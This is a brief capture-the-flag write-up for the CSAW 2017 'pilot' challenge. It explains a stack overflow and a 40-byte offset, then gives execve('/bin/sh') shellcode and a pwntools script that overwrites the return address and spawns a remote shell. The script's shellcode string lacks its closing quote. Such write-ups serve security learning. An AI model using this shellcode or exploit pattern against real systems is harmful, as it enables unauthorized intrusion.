PWN Learning: CSAW 2017 Quals - pilot

CSAW 2017 Quals - pilot Write up

A C++ PWN problem, the source code can be seen after decompiling by ida pro

A stack overflow vulnerability can be quickly discovered by decompiling the code

Debugging with gdb, pattern_create 100 after the input generated error messages

It can be calculated that the offset is 40 bytes, after inputting 40 bytes of data can overwrite the subsequent 8 bytes of return address

Use the following shellcode (execve([“/bin/sh”],[],[]))

 0:   31 f6                   xor    esi, esi
 2:   48                      dec    eax
 3:   bb 2f 62 69 6e          mov    ebx, 0x6e69622f
 8:   2f                      das    
 9:   2f                      das    
 a:   73 68                   jae    0x74
 c:   56                      push   esi
 d:   53                      push   ebx
 e:   54                      push   esp
 f:   5f                      pop    edi
10:   6a 3b                   push   0x3b
12:   58                      pop    eax
13:   31 d2                   xor    edx, edx
15:   0f 05                   syscall

Get flag

Here is the attack script:

from pwn import *

shellcode = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05
# print(disasm(shellcode))

#io = process("./easy_pwn")
io = remote("xxx.xxx.xxx.xxx", xxxx)

io.recvuntil("Location:")
addr = int(io.recv()[0:14], 16)
# print(address)

io.sendline(shellcode+b'a'*(40-len(shellcode))+p64(addr))
io.interactive()